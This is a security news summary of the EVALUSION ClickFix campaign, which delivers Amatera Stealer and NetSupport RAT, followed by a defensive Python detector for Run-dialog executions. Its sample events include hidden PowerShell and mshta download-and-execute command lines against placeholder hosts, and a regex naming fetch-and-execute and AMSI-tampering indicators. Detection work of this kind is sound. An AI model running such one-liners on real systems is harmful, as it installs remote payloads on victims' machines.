In November 2025, a malware campaign tracked as EVALUSION came to light, illustrating the increasing sophistication of cyber-attacks. The campaign uses a technique called ClickFix, in which users are tricked into pasting and executing commands in the Windows Run window. That action downloads Amatera Stealer, an infostealer that targets browsers, wallets, and password managers. After the initial infection, the attackers deploy NetSupport RAT, which gives them full remote access to the compromised system.
The operation relies on elaborate social engineering to persuade victims to run the commands that deploy the malware. Amatera Stealer, originally branded as ACR Stealer by the criminal group SheldIO, is known for its evasion capabilities: it bypasses conventional security controls through techniques such as WoW64 SysCalls and encrypted communication protocols. It also conceals its activity by disabling AMSI and by using RC2 encryption for payload retrieval. Its communication with command-and-control servers runs over AES-256-CBC encrypted connections, which complicates detection for security teams.
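As an added example (not code from the article or from the Cyber Security News report), the following Python snippet flags ClickFix-style executions in constructed process-creation records: a script host or other living-off-the-land binary launched directly from explorer.exe, which is what a command pasted into the Run dialog produces, combined with download-and-execute or hidden-window indicators on the command line. The event field names, the sample command lines and the placeholder URLs are assumptions, not observed EVALUSION artifacts.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified).
# The command lines illustrate the generic ClickFix pattern and are made up; they
# are not the actual EVALUSION/Amatera commands.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -ep bypass -c "iex (irm https://example.invalid/x)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/verify.hta"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"parent": r"C:\Program Files\Git\git-bash.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -c "Get-Process"'},
]

# Script hosts and download-capable binaries commonly launched by ClickFix lures.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe",
           "bitsadmin.exe", "certutil.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line indicators of remote fetch + execute, hidden windows, or AMSI tampering.
SUSPICIOUS = re.compile(
    r"(iex|invoke-expression|invoke-webrequest|irm|downloadstring|downloadfile|"
    r"https?://|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|amsi|frombase64string)",
    re.IGNORECASE,
)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons an event looks like a Run-dialog (ClickFix) execution."""
    reasons = []
    if basename(ev["parent"]) == "explorer.exe" and basename(ev["image"]) in LOLBINS:
        reasons.append("script host / LOLBin spawned directly by explorer.exe (Run dialog pattern)")
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(ev["cmdline"])})
    if hits:
        reasons.append("download/execute or hidden-window indicators: " + ", ".join(hits))
    return reasons


def find_clickfix_candidates(events):
    """Keep only events that match both the parent/child pattern and command-line indicators."""
    return [{**ev, "reasons": score_event(ev)} for ev in events if len(score_event(ev)) == 2]
```

Because the lure text is pasted into the Run dialog, the same command lines also persist in the user's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which is a useful forensic cross-check after the fact.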
Read the original: Cyber Security News